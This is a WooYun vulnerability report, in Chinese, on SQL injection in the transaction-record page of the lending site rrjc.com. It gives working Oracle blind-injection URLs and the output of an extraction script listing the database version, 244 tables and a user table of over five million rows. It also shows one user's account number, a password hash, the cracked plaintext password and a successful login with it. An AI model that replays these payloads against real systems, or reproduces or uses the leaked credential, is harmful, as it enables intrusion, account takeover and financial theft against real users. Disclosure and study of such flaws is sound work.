WooYun.org

测试方法:普通用户登录后,访问以下链接可返回个人的交易数据。
由于参数 paramMap.transactionType 存在 SQL 注入,可导致整个网站被脱
裤,用户个人数据、项目数据、资金数据等敏感信息泄露。
1 http://www.rrjc.com/queryFundrecordNewList.do?paramMap.transacti onType=1111111%27

2 http://www.rrjc.com/queryFundrecordNewList.do?paramMap.transacti onType=1' and 0<(SELECT COUNT(*) FROM DUAL) and 'a'='a

3 http://www.rrjc.com/queryFundrecordNewList.do?paramMap.transacti onType=1111111' AND (SELECT length(banner) FROM V$VERSION WHERE ROWNUM=1)>0 or 'Axii'='Axii

4、编写测试脚本进行sql注入取数据库数据

[*] 注入点:
http://www.rrjc.com/queryFundrecordNewList.do?pageBean.pageNum=1&pa ramMap.fundMode=&paramMap.startTime=2015-09-23&paramMap.endTime=2 015-09-24&paramMap.checkType=0&paramMap.transactionType=1111111
[*] 数据库版本信息
Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production [*] 数据库用户 RRJC
[*] 当前数据库 RRJC
[*] 数据库 RRJC 含有 244 个数据表
[POC 编写者] Anpro-hacker
[风险] 目标 http://www.rrjc.com 存在 oracle 盲注漏洞
[详细说明] oracle 盲注漏洞
[危害等级] 高
[漏洞类别] 注入
[程序返回]
目标 http://www.rrjc.com 存在 sql 注入
数据库版本信息为: Oracle Database 11g Enterprise Edition Release
11.2.0.3.0 - 64bit Production 数据库用户为: RRJC 当前数据库为: RRJC
数据库 RRJC 含有 244 个数据表
6 提取用户表T_USER数据
用户表 T_USER 总共有 510 万多条数据!

部分用户帐户信息：

7、测试登录
ID:70
账号:[email protected]
账户密码:370915435e8687441d8e9b0df 58540fe
交易密码:370915435e8687441d8e9b0df 58540fe
370915435e8687441d8e9b0df 58540fe 破解为 zl3728512 使用账号:[email protected] 密码:zl3728512 成功登陆!